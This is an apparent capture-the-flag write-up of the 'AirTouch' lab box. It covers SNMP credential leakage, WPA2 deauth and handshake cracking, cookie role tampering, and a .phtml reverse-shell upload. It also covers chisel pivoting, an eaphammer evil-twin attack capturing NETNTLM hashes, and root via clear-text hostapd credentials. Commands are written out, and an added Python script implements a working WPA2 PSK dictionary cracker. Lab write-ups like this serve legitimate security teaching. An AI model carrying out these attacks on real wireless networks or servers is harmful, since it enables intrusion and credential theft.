AirTouch
(Medium Linux)

OVERVIEW
So, as always, we are given an IP, so let's start enumeration with Nmap.
ENUMERATION
Only two ports are open: SSH and SNMP. SNMP listens on UDP port 161, so a plain TCP scan will not show it; run a UDP scan as well. A script scan against the SNMP service on port 161 reveals the community string (public) and the hostname (Consultant).
If the script scan does not return the community string (or the hostname), brute-force the community string with onesixtyone:
onesixtyone -c /usr/share/wordlists/dirb/common.txt MACHINE-IP
onesixtyone prints the system description of every agent that answers a community string; on this box that gives us all three things: hostname, community string, and a password (if one is present).
Otherwise, with the community string from the Nmap scan, use snmpwalk to pull more information (the full OID tree):
snmpwalk -v2c -c public MACHINE-IP
That output gives us the credentials, so SSH in as the consultant user (for convenience, add the IP to /etc/hosts as airtouch.htb):
ssh consultant@airtouch.htb
After login, checking our sudo rights shows that the consultant user can run any command as root without a password, so sudo su gives a root shell.
There are two images in the home directory; pull them to the attacker machine with scp:
scp consultant@airtouch.htb:Remote-path local-path
#scp consultant@airtouch.htb:/home/consultant/file.png /home/kali/Airtouch_htb/
The image shows a network of three VLANs (Virtual Local Area Networks), each on its own subnet. We are currently in the Consultant VLAN as root, and ip a shows several WLAN (Wireless Local Area Network) interfaces.
To see the wireless networks around us we use airodump-ng (the interface must be in monitor mode):
airodump-ng wlan0
AirTouch-Internet has a station connected, which means we can force it to reconnect, capture the WPA 4-way handshake, and crack the PSK offline.
For that we use airodump-ng, aireplay-ng and aircrack-ng.
airodump-ng --bssid F0:9F:C2:A3:F1:A7 -c 6 --write output wlan0
In a second terminal, start the deauthentication attack with aireplay-ng; the station reconnects and airodump-ng captures the handshake:
aireplay-ng --deauth 4 -a F0:9F:C2:A3:F1:A7 -c 28:6C:07:FE:A3:22 wlan0
Once the deauth frames have gone out, switch to the airodump-ng terminal: its header line shows "WPA handshake: F0:9F:C2:A3:F1:A7" when the handshake has been captured. Press Ctrl+C to stop it, since airodump-ng never exits on its own.
The capture is in output-01.cap in the current directory. Crack the handshake with aircrack-ng; a wordlist is available under /root/eaphammer/wordlists/:
aircrack-ng output-01.cap -w /root/eaphammer/wordlists/rockyou.txt
We got the PSK for AirTouch-Internet. Before joining the network, open output-01.cap in Wireshark and decrypt it with the PSK to see what the station was doing.
First transfer output-01.cap to your local machine with the same scp command as before:
scp consultant@airtouch.htb:/path-to-cap-file /local-machine-path-where-you-want-to-save-it
Open the file with wireshark output-01.cap.
There are two cases:
→ You see HTTP packets when you type http in the filter bar.
→ You see no packets at all for the http filter.
In the second case the data frames are still encrypted. Wireshark can decrypt them because the capture also contains the 4-way handshake it needs to derive the session keys; add the PSK as follows:
Go to Edit, then Preferences (or press Ctrl + Shift + P).
Click Protocols and scroll down to IEEE 802.11, then select it and make sure "Enable decryption" is ticked.
Next to "Decryption keys", click Edit.
Press + to add a key, choose key type wpa-pwd and enter
challenge:AirTouch-Internet
(the format is passphrase:SSID), then press OK and Apply.
Now HTTP packets show up for the http filter.
Follow any of them as an HTTP stream: the station requests /lab.php on host 192.168.3.1 port 80 and sends a PHPSESSID cookie together with a UserRole cookie set to user. It is a Wi-Fi configuration login page, so we can reuse this session cookie to get in as the manager user:
Cookie: PHPSESSID=cir69csvsr2qq6u8pac9eavsog; UserRole=user
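What aircrack-ng does with output-01.cap, and what Wireshark does with a wpa-pwd key, is the same key schedule: PBKDF2 the passphrase and SSID into the PMK, expand it with both MACs and both nonces into the PTK, and check the MIC on the second EAPOL-Key message with the KCK. The following Python example is added here and is not the writeup's or aircrack-ng's code. It works on a constructed handshake: the BSSID and station MAC are the ones seen above, the nonces and the EAPOL frame are fabricated, the passphrase is "challenge" on AirTouch-Internet, and the wordlist is a four-entry stand-in for rockyou.txt. It skips pcap parsing and starts from the five fields a cracker extracts from the capture.

```python
"""Offline WPA2-PSK dictionary attack against a 4-way handshake.

Constructed example: the key schedule aircrack-ng runs over output-01.cap and
Wireshark runs for a wpa-pwd key. Handshake fields are fabricated here except
the BSSID and station MAC, which are the ones from the capture above.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional

# Offset of the 16-byte Key MIC inside an EAPOL-Key frame:
# 802.1X header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + IV (16) + RSC (8) + ID (8) = 81
MIC_OFFSET = 81


@dataclass(frozen=True)
class Handshake:
    """The five things a cracker needs out of a capture."""
    ssid: str
    ap_mac: bytes     # BSSID
    sta_mac: bytes    # client MAC
    anonce: bytes     # AP nonce from message 1
    snonce: bytes     # station nonce from message 2
    eapol_m2: bytes   # message 2 EAPOL frame exactly as captured (MIC filled in)

    @property
    def mic(self) -> bytes:
        return self.eapol_m2[MIC_OFFSET:MIC_OFFSET + 16]

    @property
    def eapol_mic_zeroed(self) -> bytes:
        # The MIC is computed over the frame with the MIC field set to zero.
        return self.eapol_m2[:MIC_OFFSET] + bytes(16) + self.eapol_m2[MIC_OFFSET + 16:]


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes). This is the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF over both MACs and both nonces; first 48 bytes are KCK | KEK | TK for CCMP."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(3)]
    return b"".join(blocks)[:48]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1 with the 16-byte KCK, truncated to 16 bytes."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Try every candidate; the first one whose KCK reproduces the captured MIC is the PSK."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs.ssid)
        kck = derive_ptk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs.eapol_mic_zeroed), hs.mic):
            return candidate
    return None


def build_sample_handshake(passphrase: str, ssid: str) -> Handshake:
    """Constructed capture: forge message 2 as a station holding the real PSK would send it."""
    ap_mac = bytes.fromhex("F09FC2A3F1A7")   # AirTouch-Internet BSSID from airodump-ng
    sta_mac = bytes.fromhex("286C07FEA322")  # station we deauthenticated
    anonce = hashlib.sha256(b"sample anonce").digest()  # fabricated nonces
    snonce = hashlib.sha256(b"sample snonce").digest()
    body = (b"\x02"                      # descriptor type: RSN (WPA2)
            + b"\x01\x0a"                # key info: pairwise, MIC present, HMAC-SHA1 version
            + b"\x00\x00"                # key length
            + (1).to_bytes(8, "big")     # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)  # nonce, key IV, RSC, key ID
            + bytes(16)                  # MIC placeholder (zero while computing)
            + b"\x00\x00")               # key data length (RSN IE omitted)
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v1, EAPOL-Key
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame)
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce,
                     frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:])


if __name__ == "__main__":
    hs = build_sample_handshake("challenge", "AirTouch-Internet")
    # Stand-in for rockyou.txt; the constructed capture was made with "challenge".
    print("PSK:", crack_psk(hs, ["password", "12345678", "airtouch", "challenge"]))
```

The cost of the attack lives entirely in pmk_from_passphrase: 4096 HMAC-SHA1 rounds per candidate, which is why a weak dictionary word falls in seconds while a long random PSK does not. Wireshark performs the same derivation once with the known passphrase and then uses the TK to decrypt the CCMP payloads, which is why it needs the handshake frames in the capture and not just the passphrase.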
Before that, join the AirTouch-Internet network with wpa_supplicant. In the consultant SSH shell (as root) run:
wpa_passphrase "AirTouch-Internet" "challenge" > /tmp/airtouch.conf
wpa_supplicant -B -i wlan0 -c /tmp/airtouch.conf
dhclient wlan0
dhclient requests a DHCP lease on wlan0 from the AirTouch-Internet network; confirm the address with ip a.
To reach 192.168.3.1 port 80 from our attacker machine we need to pivot through the consultant box. I am using chisel; if you do not know how to install and run it, watch John Hammond's video on it → LINK
Once chisel is on your local machine, copy the binary to the victim with scp or wget from a Python http.server.
We want 192.168.3.1:80 reachable locally. chisel can do this either as a SOCKS proxy (which needs the proxychains setup below) or as a plain reverse port forward, which is what the client command further down uses and which needs no proxychains at all. For the SOCKS route:
nano /etc/proxychains4.conf
At the end of the file add this line:
socks5 127.0.0.1 1080
If there is already a socks4 line, comment it out with a # at the start of the line.
Now head to the local machine and start a listener using chisel
./chisel server -p 9001 --reverse
And in victim machine do
./chisel client ATTACKER-IP:9001 R:80:192.168.3.1:80
That forward binds port 80 on the attacker machine, so run the chisel server as root (or forward to a high port such as 8080 and browse that instead). Then open http://127.0.0.1/login.php in your local browser.
If you remember, we have the manager user's session cookie; replace the existing PHPSESSID with it and reload the page.
We are in as the manager user. The UserRole cookie we captured was set to user, so let's try changing it to admin and see what happens.
Capture the request in Burp Suite and change the UserRole cookie next to PHPSESSID to admin.
Forward the request and see.
We became admin and gained an upload function, which we can use to upload a reverse shell. Let's try the PentestMonkey PHP reverse shell.
PHP and HTML files are not allowed, so upload the same file with a .phtml extension, which the filter does not block but the web server still hands to the PHP interpreter.
It is uploaded under /uploads/. Edit the shell first so it connects back to the consultant box's wlan0 address on port 4444 (192.168.3.1 can only reach us through that interface), then start the listener in the consultant shell with nc -lvnp 4444
and browse to http://127.0.0.1/uploads/hehe.phtml
We get a reverse shell as www-data.
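Why .phtml worked: the panel evidently checks the extension against a short deny list, and a file that slips past it is still handed to PHP by the web server. The following Python example is added here and is not the panel's code (its real check is not visible in the writeup); it models the observed behaviour (.php and .html rejected, .phtml accepted) and puts that deny-list check beside an allow-list version that would have stopped the upload. The set of PHP-executed extensions is an assumption taken from the default php module config on Debian-style Apache installs.

```python
"""Upload-extension filtering: the deny list that .phtml slips past, next to an allow list.

Added example modelling the observed behaviour of the AirTouch panel; not its real code.
"""
import os
import secrets

# Extensions the writeup saw rejected by the panel.
DENIED_EXTS = {".php", ".html"}

# Extensions the default php module config on Debian/Ubuntu Apache hands to the
# PHP interpreter (FilesMatch ".+\.ph(ar|p|tml)$"). Assumption about the target,
# used here to show why a .phtml upload executes.
PHP_EXECUTED_EXTS = {".php", ".phtml", ".phar"}

# Allow list for an image-only upload, each with the magic bytes a real file starts with.
ALLOWED_IMAGES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def denylist_accepts(filename: str) -> bool:
    """The weak check: reject only the extensions on the list, accept everything else."""
    return os.path.splitext(filename)[1].lower() not in DENIED_EXTS


def would_execute(filename: str) -> bool:
    """Whether the web server would run the stored file as PHP under the assumed config."""
    return os.path.splitext(filename)[1].lower() in PHP_EXECUTED_EXTS


def allowlist_accepts(filename: str, head: bytes) -> bool:
    """Hardened check: image allow list, every dotted suffix inspected, magic bytes verified.

    head is the first few bytes of the uploaded content.
    """
    name = os.path.basename(filename).lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    # shell.phtml.png: reject any suffix PHP might execute, not just the last one.
    if any("." + p in PHP_EXECUTED_EXTS for p in parts[1:]):
        return False
    magic = ALLOWED_IMAGES.get("." + parts[-1])
    return magic is not None and head.startswith(magic)


def stored_name(original: str) -> str:
    """Never reuse the client's filename: random basename, extension taken from the allow list."""
    ext = "." + os.path.basename(original).lower().rsplit(".", 1)[-1]
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    shell = b"<?php system($_GET['c']); ?>"  # constructed sample payload header
    print("deny list accepts hehe.phtml:", denylist_accepts("hehe.phtml"),
          "and it would execute:", would_execute("hehe.phtml"))
    print("allow list accepts hehe.phtml:", allowlist_accepts("hehe.phtml", shell))
```

The allow-list version only stops the upload step; the stored file should also go into a directory the web server is configured not to execute scripts from, so that a second mistake in the filter does not become code execution.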
Next I looked in /etc/passwd for the real user account on this host.
It is user, who we need to log in as for a stable shell or an SSH session in the Tablets VLAN.
Further enumeration turned up login.php in /var/www/html,
where I found user's password. Let's try logging in with it:
it works, but I recommend taking an SSH shell as user for a stable shell.
USER FLAG
Grab user.txt from the /root directory.
For privilege escalation I found the certs-backup directory, which contains the AirTouch organisation's .crt files and the server's private key. With these we can impersonate the AirTouch-Office access point and get into the Corp VLAN, and alongside them we found the remote user's credentials for the AirTouch-Office network.
Copy the certs-backup folder to the consultant shell with scp so we can use the certificates with eaphammer, which we saw in /root/eaphammer on the consultant box:
# In user shell
cp -r /root/certs-backup/ /home/user
#now in consultant shell
scp -r user@192.168.3.1:/home/user/certs-backup /home/consultant
Now use eaphammer from /root/eaphammer to run an evil twin of AirTouch-Office. Because we hold the real server certificate and key, even clients that validate the certificate will trust our rogue RADIUS server and complete PEAP/MSCHAPv2 authentication against it, handing us a challenge/response in NETNTLM format that we can crack offline. In short, the goal is to steal RADIUS credentials from the AirTouch-Office network.
RADIUS CREDENTIALS AND WHAT ARE WE DOING WITH EAPHAMMER
To know about importing certs you can read about that in Eaphammer Wiki also you can find commands for other attacks
So let’s import the certs using eaphammer
./eaphammer --cert-wizard import --ca-cert /home/consultant/certs-backup/ca.crt --server-cert /home/consultant/certs-backup/server.crt --private-key /home/consultant/certs-backup/server.key
With the certificates imported, run the RADIUS credential capture from the eaphammer wiki.
Get the AirTouch-Office BSSID from airodump-ng again, this time listening on the 5 GHz band as well (--band abg):
airodump-ng --band abg wlan1
The scan shows the BSSID and channel. Make sure wlan1 is up, then start the attack:
ifconfig wlan1 up
./eaphammer --bssid AC:8B:A9:AA:3F:D2 --essid AirTouch-Office --channel 44 --interface wlan1 --auth wpa-eap --creds
Once it is running, wait until a client authenticates and eaphammer prints the captured credentials; the john-ready line starts with $NETNTLM$.
Save that line to hash.txt and crack it with John the Ripper (add --format=netntlm if john does not detect the format on its own):
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Since AirTouch-Office uses PEAP with MSCHAPv2 as the inner method, the wpa_supplicant config differs from the PSK one we used for AirTouch-Internet. The syntax is documented here → LINK
(PEAP sends the identity as DOMAIN\user, so the domain name is part of the identity.)
nano /tmp/airtouchoffice.conf
→ The domain/organisation name can be found in ca.crt.
network={
ssid="AirTouch-Office"
key_mgmt=WPA-EAP
eap=PEAP
identity="AirTouch\r4ulcl"
password="lab*******"
phase2="auth=MSCHAPV2"
}
Now same command like earlier to enter into the network
ifconfig wlan2 up
wpa_supplicant -B -i wlan2 -c /tmp/airtouchoffice.conf
dhclient wlan2
Now ip a on wlan2 shows an address in the Corp VLAN.
We are inside the Corp VLAN!
SSH into the Corp host with the remote credentials found earlier:
ssh remote@10.10.10.1
We are in, but this time becoming root is not as easy as before. Since this host also runs the wireless side, let's check the hostapd configuration files, which by default live in /etc/hostapd.
Bingo, the files are there; let's go through each for anything interesting.
hostapd_wpe.eap_user (the hostapd-wpe user file, which stores EAP credentials in clear text) gives us
an admin password. admin is a real user with /bin/bash in /etc/passwd, so let's check whether we can su to it.
ROOT FLAG
Well well well: the admin password works, admin has passwordless sudo, so we escalate to root, grab root.txt and the machine is solved.
WE FINALLY DID IT !!!! CHALLENGE SOLVED !!
For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com
THANKS FOR READING !!!



